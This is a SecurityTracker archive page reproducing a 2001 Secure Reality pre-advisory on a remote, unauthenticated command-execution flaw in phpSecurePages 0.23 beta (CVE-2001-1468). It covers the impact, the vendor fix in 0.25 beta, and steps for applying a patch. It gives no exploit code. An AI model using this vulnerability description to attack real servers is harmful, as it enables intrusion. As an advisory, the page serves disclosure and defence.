SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   phpSecurePages Vendors:   Kruyt, Paul
phpSecurePages Allows Remote Unauthenticated Users to Execute Commands on the Server
SecurityTracker Alert ID:  1001408
SecurityTracker URL:  http://securitytracker.com/id/1001408
CVE Reference:   CVE-2001-1468   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 23 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): phpSecurePages 0.23 beta
Description:   Secure Reality announced a vulnerability in phpSecurePages that allows remote users to execute commands on the server without authentication.

Secure Reality plans a full advisory shortly. Prior versions are assumed to be vulnerable but have not been tested by Secure Reality.

The vendor reports that the vulnerability only applies to Unix servers [and presumably to Linux] if PHP is configured to accept files from remote servers.

Impact:   A remote user can upload commands to the server and cause them to be executed.
Solution:   The vendor has release version 0.25 beta that corrects the problem. See the vendor URL.

Secure Reality also provided patches. See the source message for information on the Secure Reality patches.

Vendor URL:  www.phpSecurePages.f2s.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  (SRPRE00002) phpSecurePages 0.23 beta


=================================================
Secure Reality Pty Ltd. Security Pre-Advisory #2 (SRPRE00002)
http://www.securereality.com.au
=================================================

[Title]
Remote command execution vulnerabilities in phpSecurePages

[Released]
23/4/2001

This is a pre-release. This vulnerability will be discussed in detail during
Shaun Clowes' speech at the Black Hat briefings in Asia in the week of the
23rd of April. A full advisory will be issued following the conference

[Vulnerable]
phpSecurePages 0.23 beta

All prior versions are almost certainly vulnerable but not tested

[Impact]
Remote command execution by unauthenticated remote users

[Fix]
The Authors have not yet been able to correct the issues in mainstream
versions. SecureReality is providing patches for the problems, no liability
for the performance or effectiveness of these patches is accepted.

phpSecurePages 0.23 beta:
http://www.securereality.com.au/patches/phpSecurePages-SecureReality.diff

Users of earlier versions are advised to upgrade to the versions specified
then apply the patches.

To apply the patches:
 - cd to the directory in which the application files are stored (e.g
   /home/httpd/html/phpSecurePages/)
 - run 'patch -p0 < *Path to patch file*'

[Disclaimer]
Advice, directions and instructions on security vulnerabilities in this
advisory do not constitute: an endorsement of illegal behavior; a guarantee
that protection measures will work; an endorsement of any product or
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is
provided as is and Secure Reality Pty Ltd does not accept responsibility for
any damage or injury caused as a result of its use.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC